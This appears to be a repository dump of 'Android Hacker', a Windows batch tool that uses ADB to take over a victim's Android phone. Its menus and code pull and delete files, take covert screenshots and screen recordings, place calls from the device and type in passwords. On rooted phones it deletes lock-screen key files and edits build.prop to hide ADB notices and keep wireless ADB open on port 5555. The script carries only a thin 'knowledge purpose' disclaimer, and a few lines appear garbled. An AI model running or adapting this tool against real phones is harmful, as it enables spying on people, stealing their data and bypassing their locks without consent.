Devices Connected "Press 4" To Back To Previous Menu ] 696 | ) else ( 697 | echo [ Victim's Device Connected ] 698 | ) 699 | echo. 700 | echo [1] Send Default Message On Victim's Device If Device Is Unlocked. 701 | echo. 702 | echo [2] Type Your Own Message If Device IS Unlocked. 703 | echo. 704 | echo [3] Unlock Victim's Device If You Know Password. 705 | echo. 706 | echo [4] Got To Previous Menu/menu3 707 | echo. 708 | set inpur="" 709 | set /p input= [-] Select an option number above: 710 | if %input%==1 goto dmsg 711 | if %input%==2 goto ymsg 712 | if %input%==3 goto entpass 713 | if %input%==4 goto menu3 714 | echo. 715 | @echo Not a valid choice Try Again 716 | pause >nul 717 | goto munlock 718 | ::--------------------------------------------- 719 | :dmsg 720 | echo. 721 | echo Hit Any To Start Typing Message 722 | pause > nul 723 | adb shell input swipe 407 1211 378 85 724 | adb shell input text "Heloooo" 725 | adb shell input keyevent 62 726 | adb shell input text "Your" 727 | adb shell input keyevent 62 728 | adb shell input text "Device" 729 | adb shell input keyevent 62 730 | adb shell input text "Is" 731 | adb shell input keyevent 62 732 | adb shell input text "Hacked" 733 | adb shell input keyevent 62 734 | adb shell input text "By" 735 | adb shell input keyevent 62 736 | adb shell input text "Android" 737 | adb shell input keyevent 62 738 | adb shell input text "Hacker" 739 | adb shell input keyevent 62 740 | adb shell input text "Author" 741 | adb shell input keyevent 62 742 | adb shell input text "Prashant" 743 | adb shell input keyevent 62 744 | adb shell input text "Thankyou" 745 | adb shell input keyevent 62 746 | adb shell input keyevent 66 747 | pause 748 | goto fun 749 | ::------------------------------------------------ 750 | :ymsg 751 | echo. 752 | echo [-] Enter Your Message To Send On Victim's Device. 753 | echo ***Note:- Type Only Alphabets And Digits Without Space Or Any Special Characters. 754 | set msg="" 755 | set /p msg=[ 756 | echo. 757 | adb shell input swipe 407 1211 378 85 758 | adb shell input text "%msg%" 759 | pause 760 | goto fun 761 | ::------------------------------------------------- 762 | :entpass 763 | echo. 764 | echo [-] Enter Password To Unlock Victim's Device 765 | echo. 766 | set pass="" 767 | set /p pass=[ 768 | adb shell input keyevent 3 769 | adb shell input swipe 407 1211 378 85 770 | adb shell input text "%pass%" 771 | adb shell input keyevent 66 772 | adb shell input keyevent 3 773 | echo. 774 | pause 775 | goto fun 776 | 777 | ::------------------------------------------------------------------------------------------------------------------munlock/Menu 4 778 | :Menu4 779 | cls 780 | echo. 781 | echo ---------------------------- 782 | echo Menu 4 783 | echo ---------------------------- 784 | echo. 785 | adb devices -l | find "device product:" >nul 786 | if errorlevel 1 ( 787 | echo [ No Devices Connected "Press 6" To Back To Previous Menu ] 788 | ) else ( 789 | echo [ Victim's Device Connected ] 790 | ) 791 | echo. 792 | echo This Menu Is Only For Rooted Android Device 793 | echo Features Won't Work If Victim's Phone Is Not Rooted 794 | echo. 795 | echo [1] Open Lock Screen 796 | echo. 797 | echo [2] Developer Defined build.prop Changes 798 | echo [3] Download, Tweak And Upload Build.prop 799 | echo. 800 | echo [4] Turn On Bluetooth 801 | echo [5] Turn Of Bluetooth 802 | echo. 803 | echo [6] Go To Menu 3 For Non Rooted Devices 804 | echo [7] Go Back To Previous Menu/Menu 2 805 | 806 | echo. 807 | set input="" 808 | set /p input= [-] Select an option number above: 809 | if %input%==1 goto lckscreen 810 | if %input%==2 goto devbuild 811 | if %input%==3 goto dtubuild 812 | if %input%==4 adb shell "su -c 'service call bluetooth 3'" & pause & goto menu4 813 | if %input%==5 adb shell "su -c 'service call bluetooth 5'" & pause & goto menu4 814 | if %input%==6 goto menu3 815 | if %input%==7 goto menu2 816 | echo. 817 | @echo Not a valid choice Try Again 818 | pause >nul 819 | goto menu4 820 | ::------------------------------------------------------------------ 821 | :lckscreen 822 | adb shell "su -c 'rm /data/system/*.key'" 823 | adb shell input keyevent 3 824 | adb shell input swipe 407 1211 378 85 825 | pause 826 | goto menu4 827 | ::-------------------------------------------------------------------------------build.prop 828 | ::best way to tweak build.prop 829 | :devbuild 830 | adb shell "su -c 'setprop persist.adb.notify 0'" 831 | adb shell "su -c 'echo "persist.adb.notify=0" >> /system/build.prop'" 832 | adb shell "su -c 'echo "service.adb.tcp.port=5555" >> /system/build.prop'" 833 | adb shell "su -c 'echo "persist.service.adb.root=1" >> /system/build.prop'" 834 | adb shell chmod 644 /system/build.prop 835 | echo. 836 | pause 837 | goto menu4 838 | ::-----------------------------------------------------------Download, Tweak And Upload Build.prop 839 | :dtubuild 840 | echo. 841 | md Androiddata 842 | adb pull /system/build.prop %cd%\Androiddata 843 | echo. 844 | echo [*] Build File Is Downloaded In Androiddata Folder. 845 | echo Now Open And Edit Build.prop Then Come Back And Any Press Any Key To Upload It To Android Device 846 | echo ***Note Carefully Edit Build.prop Because Little Mistake Can Brick Your Android Device. 847 | echo ***Do Not Rename Or Change Location Of Build.prop File 848 | echo ***Uploading Build.prop To System Folder Needs Rooted Android Device 849 | echo. 850 | echo If You Are Done Tweaking Build File Press Any Key To Upload It. 851 | pause >nul 852 | echo. 853 | adb shell "su -c 'adb push %cd%\Androiddata\build.prop /system/build.prop'" 854 | adb shell chmod 644 /system/build.prop 855 | echo. 856 | pause 857 | goto menu4 858 | ::---------------------------------------------------------------------------------------------------------build.prop 859 | :: below code is not included in the program 860 | 861 | adb sideload 862 | 863 | :: for M+ 864 | adb reboot sideload 865 | 866 | open bootloader 867 | install updates sideload 868 | full devices bsckup 869 | restore 870 | Change MAC Address 871 | Change LAN IP Address 872 | change IMEI 873 | adb root 874 | 875 | adb shell 876 | su 877 | service call bluetooth 3 878 | 879 | adb shell am start -a android.intent.action.CALL tel:1112223333 880 | adb -s shell am start -a android.intent.action.CALL -d tel:555-5555 881 | 882 | 883 | adb shell "su -c '[your command goes here]'" 884 | goto menu3 885 | service call bluetooth_manager 8 886 | adb shell "su -c 'service call bluetooth 5'" 887 | 888 | adb shell am start -n com.steinwurf.adbjoinwifi/com.steinwurf.adbjoinwifi.MainActivity -e ssid [SSID] -e password_type [PASSWORD_TYPE] -e password [WIFI PASSWORD 889 | adb shell am start -n com.steinwurf.adbjoinwifi/com.steinwurf.adbjoinwifi.MainActivity -e ssid [Brains] -e password_type [WPA/WPA2 PSK] -e password [9..9..6@x] 890 | 891 | 892 | down vote 893 | accepted 894 | This is possible to achieve using wpa_cli, command line interface of wpa_supplicant: 895 | 896 | # Enable WiFi 897 | adb root 898 | adb shell 899 | 900 | # Get to wpa_cli prompt 901 | wpa_cli -p /data/misc/wifi/sockets/ -i wlan0 902 | 903 | # Add new WiFi network 904 | add_network 905 | set_network 0 auth_alg OPEN 906 | set_network 0 key_mgmt WPA-PSK 907 | set_network 0 ssid "network_name" 908 | set_network 0 proto RSN 909 | set_network 0 mode 0 910 | set_network 0 psk "password" 911 | 912 | # Connect to it 913 | select_network 0 914 | enable_network 0 915 | reassociate 916 | 917 | # Check the status 918 | status 919 | 920 | :instag 921 | adb install %cd%/apk/nonrootunlock.apk 922 | :startag 923 | adb shell am start -S io.kos.antiguard/.unlock 924 | :uninstag 925 | adb uninstall io.kos.antiguard 926 | 927 | 928 | 929 | 930 | ::adb shell am start -n com.steinwurf.adbjoinwifi/com.steinwurf.adbjoinwifi.MainActivity -e ssid [SSID] -e password_type [PASSWORD_TYPE] -e password [WIFI PASSWORD] 931 | -------------------------------------------------------------------------------- /Android Hacker.txt: -------------------------------------------------------------------------------- 1 | @echo off 2 | title Android Hacker 3 | rem CursorHide 4 | mode con:cols=110 lines=50 5 | ::rem ChangeColor %o1% %o2% 6 | 7 | color 0B 8 | :ano 9 | echo. 10 | echo ..:///+osssssssssso+//:.. 11 | echo .:/shdNNNNMMMMMMMMMMMMMMMMMMMMMNNNNmhy+/- 12 | echo -odNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNmh+. 13 | echo :hNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNy 14 | echo :NMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMh 15 | echo :NMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMh 16 | echo dMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM- 17 | echo -NMMMMMMMMMMNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNNNMMMMMMMMMy 18 | echo +MMMMMmho/:---:/oydNMMMMMMMMMMMMMMMMNmyo/--..-:+ymMMMMMN 19 | echo hMMMmo//so+/:. `./hNMMMMMMMMMMMdo-` `..-:/os+/+hMMMM. 20 | echo .NMMhsdNMMms+/-``--` -yMMMMMMMMm/` `-/--::/smMMMmhyNMMo 21 | echo .MMNmMMMMMMMMMNho.`-/. dMMMMMMM: .//-./hNMMMMMMMMMNmMMs 22 | echo :MMMMMMMMMMMMMMMMms-`://+NMMMMMMMy/+/..odMMMMMMMMMMMMMMMMs 23 | echo +MMMMMMMMMMMMMMMMMMNh- :dMMMMMMMMNy`.smMMMMMMMMMMMMMMMMMMh 24 | echo sMMMMMMNmhysoosyhmNMMm- `hMMMMMMMy.sNMMNmyso//+sshmMMMMMMM 25 | echo hMMMMNy:` `-odNm` .NMMMMMMmmMMds:` `/dMMMMM 26 | echo hMMdo: :m. hMMMMMMMMM/ `++hmN 27 | echo oMMh ``..---::::://+sdd. +MMMMMMMMMNo//+ooooo+/+oooyhhsoy 28 | echo hMMyhdNNMMMMMMMMMMMMMMm` oMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM 29 | echo +MMMMMMMMMMMMMMMMMMMMMd dMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM 30 | echo `dMMMMMMMMMMMMMMMMMMMM+ dMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMN 31 | echo /MMMMMMMMMMMMMMMMMMM- yMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM+ 32 | echo : yMMMMMMMMMMMMMMMMMy oMMMMMMMMMMMMMMMMMMMMMMMMMMMMm+ 33 | echo sy`.smMMMMMMMNNNMms/ dMMMMMMMmohNMMMMMMMMMMMMMMMd/: 34 | echo .mo ...-::://+sm. -: mMMMMMMMMms/NMMh++osssoo+/. /y 35 | echo -N: +: `hNNMMMMN. :No -MMMMMMMMMMModMMMNmmhy/ -/ .m- 36 | echo +N/`y- `oNMMMMMmodM+ +MMMMMMMMMMMNMMMMMMMNo /m:`dy 37 | echo oNo.o: .+hNMMMMMMN/ oMMMMMMhdMMMMMMMMMNy- /N+`ym` 38 | echo sMh.//` .-+yhdho` `:/ss/- `omMMMNdy+. od:`hN- 39 | echo oMd:.++-` `` -o- `....` `/yo`.dN: 40 | echo oNN/ .ohs/-` +mMNs. .:ohy/ -mm: 41 | echo +NNs` .smNmdys+++:++yss+.--///+sdmMMds.+Nd. 42 | echo \mMy` .ohmMMMMMNNNmmmmmNNMMMMMMMMMy.sNy` 43 | echo \dMh` odyyyhddmmmmmmmNNMMMMMMMMMs-dNo 44 | echo \hMh` yMMMNmdh/....`./hMMMMMMMNo+Nm/ 45 | echo \sNh`yMMMMMMMN. -mMMMMMMMNohNd- 46 | echo +Ns-MMMMMMMm. /MMMMMMMMdmMy` 47 | echo -yhMMMMMMN- `dMMMMMMMMN+` 48 | echo /mMMMMMd +MMMMMMMm- 49 | echo -dMMMMN` yMMMMMMy` 50 | echo .yNMMM+ .NMMMMd/ 51 | echo /hNMm` yMMNd/` 52 | echo -+o. os+- 53 | echo. 54 | echo. 55 | pause >nul 56 | cls 57 | color 8b 58 | echo. 59 | echo " ________ ________ ________ ________ ________ ___ ________ "; 60 | echo " |\ __ \|\ ___ \|\ ___ \|\ __ \|\ __ \|\ \|\ ___ \ "; 61 | echo " \ \ \|\ \ \ \\ \ \ \ \_|\ \ \ \|\ \ \ \|\ \ \ \ \ \_|\ \ "; 62 | echo " \ \ __ \ \ \\ \ \ \ \ \\ \ \ _ _\ \ \\\ \ \ \ \ \ \\ \ "; 63 | echo " \ \ \ \ \ \ \\ \ \ \ \_\\ \ \ \\ \\ \ \\\ \ \ \ \ \_\\ \ "; 64 | echo " \ \__\ \__\ \__\\ \__\ \_______\ \__\\ _\\ \_______\ \__\ \_______\ "; 65 | echo " \|__|\|__|\|__| \|__|\|_______|\|__|\|__|\|_______|\|__|\|_______| "; 66 | echo " "; 67 | echo " ___ ___ ________ ________ ___ __ _______ ________ "; 68 | echo " |\ \|\ \|\ __ \|\ ____\|\ \|\ \ |\ ___\ |\ __ \ "; 69 | echo " \ \ \\\ \ \ \|\ \ \ \___|\ \ \/ /|\ \ \__|_\ \ \|\ \ "; 70 | echo " \ \ __ \ \ __ \ \ \ \ \ ___ \ \ \___\\ \ _ _\ "; 71 | echo " \ \ \ \ \ \ \ \ \ \ \____\ \ \\ \ \ \ \__|_\ \ \\ \ "; 72 | echo " \ \__\ \__\ \__\ \__\ \_______\ \__\\ \__\ \______\\ \__\\ _\ "; 73 | echo " \|__|\|__|\|__|\|__|\|_______|\|__| \|__|\|______| \|__|\|__| "; 74 | echo " "; 75 | echo " ________ _______ ___ ___ _______ ___ ________ ________ _______ ________ "; 76 | echo " |\ ___ \|\ ___\ |\ \ / /|\ ___\ |\ \ |\ __ \|\ __ \|\ ___\ |\ __ \ "; 77 | echo " \ \ \_|\ \ \ \__|_\ \ \ / / | \ \__|_\ \ \ \ \ \|\ \ \ \|\ \ \ \__|_\ \ \|\ \ "; 78 | echo " \ \ \ \\ \ \ \___\\ \ \/ / / \ \ \___\\ \ \ \ \ \\\ \ \ ____\ \ \___\\ \ _ _\ "; 79 | echo " \ \ \_\\ \ \ \__|_\ \ / / \ \ \__|_\ \ \____\ \ \\\ \ \ \___|\ \ \__|_\ \ \\ \ "; 80 | echo " \ \_______\ \______\\ \__/ / \ \______\\ \_______\ \_______\ \__\ \ \______\\ \__\\ _\ "; 81 | echo " \|_______|\|______| \|__|/ \|______| \|_______|\|_______|\|__| \|______| \|__|\|__|"; 82 | echo " "; 83 | echo " ________ ________ ________ ________ ___ ___ ________ ________ _________ "; 84 | echo " |\ __ \|\ __ \|\ __ \|\ ____\|\ \|\ \|\ __ \|\ ___ \|\___ ___\ "; 85 | echo " \ \ \|\ \ \ \|\ \ \ \|\ \ \ \___| \ \\\ \ \ \|\ \ \ \\ \ \|___ \ \_| "; 86 | echo " \ \ ____\ \ _ _\ \ __ \ \_____ \ \ __ \ \ __ \ \ \\ \ \ \ \ \ "; 87 | echo " \ \ \___|\ \ \\ \\ \ \ \ \|____|\ \ \ \ \ \ \ \ \ \ \ \\ \ \ \ \ \ "; 88 | echo " \ \__\ \ \__\\ _\\ \__\ \__ ______\ \ \__\ \__\ \__\ \__\ \__\\ \__\ \ \__\ "; 89 | echo " \|__| \|__|\|__|\|__|\|__|\|_______|\|__|\|__|\|__|\|__|\|__| \|__| \|__| "; 90 | echo. 91 | pause >nul 92 | :: Android Hacker ;Author Prashant Mishra ;GitHub User :Prashant Mishra 93 | :: This Software Usess "ADB Commands" To Perform It's Task On Android Devices So Special Thanks To Google For Android Device, ADB, Developer Mode 94 | :: Before using this batch script you need Android SDK Or ADB Fastboot Tool For Your Convenience i have added ADB And Fastboot with package 95 | color 8b 96 | ::---------------------------------------------------------------------------------------------------------------Disclaimer 97 | cls 98 | echo. 99 | echo. 100 | echo. ________________________ 101 | echo. :Disclaimer: 102 | echo. __________________________ 103 | echo. 104 | echo. [*] This Batch Code Is Issued Only For knowledge Purpose Any Actions Or Activities 105 | echo. Related To This Batch Code Is Solely Your Responsibility, The Misuse Of This 106 | echo. Code Can Result In Criminal Charges Brought Against The Persons In Question. 107 | echo. The Author Will Not Be Held Responsible In The Event Any Criminal Charges Be 108 | echo. Brought Against Any Individuals Misusing This Code To Break The Law. 109 | echo. If You Fully Understand And Except This Disclaimer Then Only Hit Enter Or CLOSE NOW! 110 | echo. 111 | echo. 112 | echo. 113 | echo **** Don Not make Changes To Package Folder Otherwise Software Won't Work **** 114 | echo. 115 | echo. 116 | echo. 117 | echo. 118 | echo ___________To Except The Disclaimer And Continue Hit Any Key___________ 119 | pause >nul 120 | echo. 121 | echo. 122 | ::------------------------------------------------------------------------------------------------------Disclaimer/Main Menu 123 | :menu1 124 | cd %MYFILES% 125 | mode con:cols=108 lines=50 126 | cls 127 | echo. 128 | echo. 129 | echo ---------------------------- 130 | echo Main Menu 131 | echo ---------------------------- 132 | echo. 133 | echo [1] Scan Connected Victims 134 | echo. 135 | echo [2] Wired Connection (Android Over USB). 136 | echo. 137 | echo [3] Wireless Connection (Android Over Lan). 138 | echo. 139 | echo [4] Turn WiFi On. 140 | echo. 141 | echo [5] Turn Wireless Port On 142 | echo. 143 | echo [6] Goto Menu 2 (If Connection Setup Already Done) 144 | echo. 145 | echo [7] Exit 146 | echo. 147 | rem CursorShow 148 | set input="" 149 | set /p input= [-] Select an option number From Above: 150 | 151 | if %input%==1 goto adbdevices 152 | if %input%==2 goto wired 153 | if %input%==3 goto getip 154 | if %input%==4 goto wifi 155 | if %input%==5 goto adbport 156 | if %input%==6 goto menu2 157 | if %input%==7 goto Exit 158 | echo. 159 | @echo Not a valid choice Try Again 160 | pause >nul 161 | goto menu1 162 | ::-------------------------------------------------------------------------------------------------------Main Menu/adbdevices 163 | :adbdevices 164 | cls 165 | adb devices -l | find "device product:" >nul 166 | if errorlevel 1 ( 167 | echo [ No Devices Connected ] 168 | ) else ( 169 | echo [ Victim's Device Connected ] 170 | ) 171 | echo. 172 | adb shell input keyevent 3 >nul 173 | pause 174 | goto menu1 175 | ::---------------------------------------------------------------------------------------------------------------adbdevices/wired 176 | :wired 177 | cls 178 | adb kill-server 179 | adb usb >nul 180 | timeout 5 >nul 181 | adb devices -l | find "device product:" >nul 182 | if errorlevel 1 ( 183 | echo. 184 | echo [ No Devices Connected ] 185 | echo [-] Press Any Key To Back To Previous Menu ] 186 | echo. 187 | pause >nul 188 | goto menu1 189 | ) else ( 190 | echo [ Victim's Device Connected ] 191 | ) 192 | pause 193 | goto menu2 194 | ::------------------------------------------------------------------------------------------------------wired/wifi 195 | :wifi 196 | echo Turning On Wifi If Already Not Enabled.. "If There Is No Error Or Message" Enjoy Your Wifi Is ON 197 | adb shell svc wifi enable 198 | echo. 199 | pause 200 | goto menu1 201 | ::------------------------------------------------------------------------------------------------------wifi/getip 202 | :getip 203 | cls 204 | adb shell svc wifi enable 205 | echo. 206 | echo __________________ 207 | echo ______ NOTE ______ 208 | echo. 209 | echo [ Please Fallow These Steps Before Connecting To Any Android Device(Victim) Wirelessly. ] 210 | echo. 211 | echo [1] Please Make Sure That The Android Devices(Victim) You Want To Connect And Machine(Attacker) 212 | echo On Which The Software Is Running Are On The Same Wireless Network. 213 | echo. 214 | echo [2] The Device You Want To Connect Should Have Wireless Port "5555" Enabled If Not Then Connect 215 | echo Victim's Device And Attacker Machine With A USB Cable And Go Back To Previous Menu 216 | echo And Select "Option:- 4.Start Wireless Adbport" 217 | echo. 218 | echo [3] Enter Local Ip Address Of the vitim's Device You Want To Connect if you don't know Victim's IP 219 | echo Connect Through USB To Get IP Address or Download "NMAP" For Your Windows Machine And "Fing" For 220 | echo Your Android Devices To Find IP Address Of all the devices in your Network 221 | echo. 222 | adb shell ip -f inet addr show wlan0 223 | timeout 2 >nul 224 | echo. 225 | echo If You Have Performed Every Step Correctly Your Victim's Device Local IP Will Be Displayed Above. 226 | echo Please Enter "Victim's IP Mentioned Above" After "inet" and Before "/" For Example If The IP Diplayed 227 | echo In This Format .."inet 192.168.10.103/24".. You Only Need To Copy 192.168.10.103 228 | echo. 229 | :inip 230 | echo __________ Press "e" To Go Back __________ 231 | echo. 232 | set ip="" 233 | set /p ip=[-] Please Enter IP Address : 234 | echo. 235 | if %ip%==e goto menu1 236 | if %ip%=="" echo Please Enter Correct Ip & pause >nul & cls & goto inip 237 | goto wireless 238 | ::--------------------------------------------------------------------------------------------------------------getip/wireless 239 | :wireless 240 | setlocal 241 | adb kill-server 242 | ::connected 243 | >output.tmp adb connect %ip%:5555 244 | nul 248 | ::echo %line1% | find/i /i "connected to" >nul 249 | if errorlevel 0 ( 250 | goto m2 251 | ) else ( 252 | cls 253 | echo. & echo Android Hacker Is connected With The Victim's Device Wirelessly. 254 | echo Now You Can Remove The USB & echo. 255 | echo Press Any Key To Continue To Menu 2 256 | pause >nul ) 257 | goto menu2 258 | :m2 259 | ::laptop wifi off 260 | echo %line1% | find/i "unreachable network" >nul 261 | if errorlevel 1 ( 262 | goto m3 ) 263 | else( 264 | echo. & echo laptop/Desktop Wifi IS Off Or Not connected To Local Wifi/LAN 265 | echo. & echo connect laptop/Desktop To The LAN. & echo. & pause >nul 266 | echo Press Any Key To Go Back 267 | goto getip 268 | ) 269 | :m3 270 | :: Wrong Ip format 271 | echo %line1% | find/i "no such host" >nul 272 | if errorlevel 1 ( 273 | goto m4 ) 274 | else( 275 | echo. & echo Wrong Format IP Address... 276 | echo. & echo Please Enter IP In Given Format Example "192.168.10.10" 277 | echo. & echo Press Any Key To Continue....& pause >nul 278 | goto getip 279 | ) 280 | :m4 281 | ::5555 port off 282 | echo %line1% | find/i "refused it" >nul 283 | if errorlevel 1 ( 284 | goto m5 ) 285 | else( 286 | echo. & echo Android Wifi is off or 287 | echo. & echo Android Wireless Port Is Off 288 | echo. & echo Press Any Key To Turn On & pause >nul 289 | goto adbport 290 | ) 291 | :m5 292 | :: Android Wifi Off 293 | echo %line1% | find/i "faild to respond" >nul 294 | if errorlevel 1 ( 295 | goto m6 ) 296 | else ( 297 | echo. & echo Could Not connect To Given IP 298 | echo. & echo Reason Can Be... 299 | echo. & echo Android Is Not connected To Local Wifi 300 | echo. & echo Or No Device With This Ip In LAN & pause >nul 301 | goto getip 302 | ) 303 | :m6 304 | echo. 305 | echo Unknown Error & pause >nul 306 | goto getip 307 | pause >nul 308 | 309 | ::------------------------------------------------------------------------------------------------------wired/adbport 310 | :adbport 311 | adb kill-server 312 | adb tcpip 5555 313 | adb devices 314 | echo. 315 | pause 316 | goto menu1 317 | ::-------------------------------------------------------------------------------------------------------------menu 1 adbport/menu2 318 | :menu2 319 | cls 320 | echo ---------------------------- 321 | echo Menu 2 322 | echo ---------------------------- 323 | echo. 324 | adb devices -l | find "device product:" >nul 325 | if errorlevel 1 ( 326 | echo No Devices Connected "Press 4" To Back To Previous Menu 327 | ) else ( 328 | echo Victim's Device Connected 329 | ) 330 | adb shell input keyevent 3 >nul 331 | echo. 332 | echo [1] Actions For " Non Root " Android Victims. 333 | echo. 334 | echo [2] Special Action For " Root/Superuser " Android Victims. 335 | echo. 336 | echo [3] Enter Your Own Commands. 337 | echo. 338 | echo [4] Go Back To Main Menu 339 | ::------------------------------------------------ 340 | echo. 341 | set input="" 342 | set /p input= [-] Select an option number above: 343 | if %input%==1 goto menu3 344 | if %input%==2 goto menu4 345 | if %input%==3 goto enterc 346 | if %input%==4 goto menu1 347 | rem CursorHide 348 | echo. 349 | @REM Invalid Choice Message 350 | @echo Not a valid choice Try Again 351 | pause >nul 352 | goto menu 2 353 | ::------------------------------------------------------------------------------------------------------menu2/menu3 354 | :menu3 355 | cls 356 | echo. 357 | echo ---------------------------- 358 | echo Menu 3 359 | echo ---------------------------- 360 | echo. 361 | adb devices -l | find "device product:" >nul 362 | if errorlevel 1 ( 363 | echo [ No Devices Connected "Press 14" To Back To Previous Menu ] 364 | ) else ( 365 | echo [ Victim's Device Connected ] 366 | ) 367 | echo. 368 | echo [1] List Base Files And Directories 369 | echo. 370 | echo [2] Extract Data From Victim's Device 371 | echo [3] Upload Data To Victim's Devices 372 | echo [4] Delete Data From Victim's Devices 373 | echo. 374 | echo [5] Application Manager 375 | echo. 376 | echo [6] Spy On Victim's Device Screen (ScreenShot) 377 | echo [7] Spy On Victim's Device Screen (Screen Recording) 378 | echo. 379 | echo [8] **** Make Call From Victim's Device **** 380 | echo. 381 | echo [9] Turn On WiFi 382 | echo [10] Turn Off WiFi 383 | echo. 384 | echo [11] Turn On Internet 385 | echo [12] Turn Off Internet 386 | echo. 387 | echo [13] Turn On Flight Mode 388 | echo [14] Turn Of Flight Mobe 389 | echo. 390 | echo [15] Enter ADB Shell Command 391 | echo. 392 | echo [16] Unlock Device 393 | echo. 394 | echo [17] Go Back To Previous Menu(Menu1) 395 | 396 | ::----------------------------------------------------- 397 | echo. 398 | set input="" 399 | set /p input= [-] Select an option number above: 400 | if %input%==1 goto basels 401 | if %input%==2 goto adbpull 402 | if %input%==3 goto getpath2 403 | if %input%==4 goto adbdel 404 | if %input%==5 goto appman 405 | if %input%==6 goto screencap 406 | if %input%==7 goto screenreco 407 | if %input%==8 goto call 408 | if %input%==9 adb shell svc wifi enable & pause & goto menu3 409 | if %input%==10 adb shell svc wifi disable & pause & goto menu3 410 | if %input%==11 adb shell svc data enable & pause & goto menu3 411 | if %input%==12 adb shell svc data disable & pause & goto menu3 412 | if %input%==13 adb shell settings put global airplane_mode_on 1 & pause & goto menu3 413 | if %input%==14 adb shell settings put global airplane_mode_on 0 & pause & goto menu3 414 | if %input%==15 goto enterc 415 | if %input%==16 goto munlock 416 | if %input%==17 goto menu1 417 | 418 | rem CursorHide 419 | echo. 420 | @REM Invalid Choice Message 421 | @echo Not a valid choice Try Again 422 | pause >nul 423 | goto menu3 424 | ::--------------------------------------------------------------------------------------------------- 425 | :basels 426 | cls 427 | echo. 428 | echo List Of Files And Directories Of Base Folder " / ". 429 | echo. 430 | adb shell ls 431 | echo. 432 | echo Walk The Tree And Navigate Through Directories, Type "cd Directory Name" To Enter Any Directory 433 | echo And "cd -" To Go Back To Previous Directory, 434 | echo Type "Exit" Or Press "ctrl+D" Any Time To EXit Directory View. 435 | echo. 436 | rem CursorShow 437 | adb shell 438 | goto menu3 439 | ::----------------------------------------------------------------------------------------------------------- 440 | :adbpull 441 | rem CursorShow 442 | echo. 443 | echo Enter Complete Path With Name And Extention Of Data 444 | echo Which Has To Be Downloaded From Victim's Device: 445 | set vsource1="" 446 | set /p vsource1=[ 447 | md Androiddata 448 | adb pull /%vsource1% %cd%\Androiddata 449 | pause 450 | goto menu3 451 | ::----------------------------------------------------------------------------------------------------------- 452 | :getpath2 453 | echo. 454 | echo Choose File To Uploaded To Victim's Device: 455 | set hsource1="" 456 | set result="" 457 | rem BrowseFiles 458 | set /p hsource1=%result% 459 | if exist "%hsource1%" goto destination 460 | ::================================================ 461 | ::getpath2 462 | ::rem BrowseFiles 463 | ::echo Enter Complete Path With Name And Extention Of Data 464 | ::echo To Uploaded To Victim's Device: 465 | ::set hsource1="" 466 | ::set /p hsource1=[ 467 | ::goto destination 468 | ::----------------------------------------------------- 469 | :destination 470 | echo. 471 | rem CursorShow 472 | echo Enter Complete Path Of Victim's Device Where Data Has To Be Uploaded: 473 | set /p vdestinpath1=[ 474 | goto push 475 | ::--------------------------------------------------- 476 | :push 477 | adb push %hsource1% /%vdestinpath1%/ 478 | pause 479 | goto menu3 480 | ::------------------------------------------------------------------------------------------------------------------ 481 | :adbdel 482 | rem CursorShow 483 | echo. 484 | echo Enter Complete Path With Name And Extention Of Data 485 | echo To Be Deleted From Victim's Device: 486 | set vsource2="" 487 | set /p vsource2=[ 488 | adb shell rm -r %vsource2% 489 | pause 490 | goto menu3 491 | ::--------------------------------------------------------------------------------------------------------------- 492 | :appman 493 | cls 494 | echo. 495 | echo ---------------------------- 496 | echo Applicatin/Package Manager 497 | echo ---------------------------- 498 | echo. 499 | adb devices -l | find "device product:" >nul 500 | if errorlevel 1 ( 501 | echo [ No Devices Connected "Press 14" To Back To Previous Menu ] 502 | ) else ( 503 | echo [ Victim's Device Connected ] 504 | ) 505 | echo. 506 | echo [1] List Of All Application 507 | echo [2] List Of System Application 508 | echo [3] List Of Third-Party Application 509 | echo [4] Install Application On Victims Device 510 | echo [5] Uninstall Application From Victims Device 511 | echo [6] Previouse Menu 512 | echo. 513 | set input="" 514 | set /p input= [-] Select an option number above: 515 | if %input%==1 cls & adb shell pm list packages & pause & goto appman 516 | if %input%==2 cls & adb shell pm list packages -s & pause & goto appman 517 | if %input%==3 cls & adb shell pm list packages -3 & pause & goto appman 518 | if %input%==4 goto insapp 519 | if %input%==5 goto unsapp 520 | if %input%==6 goto menu3 521 | echo. 522 | @echo Not a valid choice Try Again 523 | pause >nul 524 | goto appman 525 | ::------------------------------------------------------- 526 | :insapp 527 | cls 528 | echo. 529 | echo Please Enter Full Path Of The .apk With Name And Extention File Which Is To Be Installed 530 | echo. 531 | set apkins="" 532 | set /p apkins=[ 533 | echo. 534 | adb install -r %apkins% 535 | pause 536 | goto appman 537 | ::------------------------------------------ 538 | :unsapp 539 | cls 540 | echo. 541 | adb shell pm list packages -3 542 | echo. 543 | echo Please Enter Correct Name Of Application From Above List To Uninstall 544 | echo For Example "com.application" 545 | echo. 546 | set apkuns="" 547 | set /p apkuns=[ 548 | echo. 549 | adb uninstall %apkuns% 550 | pause 551 | goto appman 552 | ::------------------------------------------------------------------------------------------------------------menu3 appmanager/ScreenShot 553 | :screencap 554 | cls 555 | echo. 556 | adb devices -l | find "device product:" >nul 557 | if errorlevel 1 ( 558 | echo [ No Devices Connected Press Any Key To Back To Previous Menu ] 559 | echo. 560 | pause >nul 561 | goto menu3 562 | ) else ( 563 | echo [ Victim's Device Connected ] 564 | ) 565 | echo. 566 | echo Android Hacker Performing ScreeenShot...... 567 | echo ScreeenShot Will Be Saved In Victim's Device /sdcard/reco And Will Be Extracted. 568 | adb -d shell mkdir /sdcard/reco 569 | adb shell screencap /sdcard/reco/screen.png 570 | echo. 571 | md Androiddata 572 | adb -d pull /sdcard/reco %cd%\Androiddata 573 | pause 574 | goto menu3 575 | ::---------------------------------------------------------------------------------------------------------ScreenShot/screenrecord 576 | :screenreco 577 | cls 578 | echo. 579 | adb devices 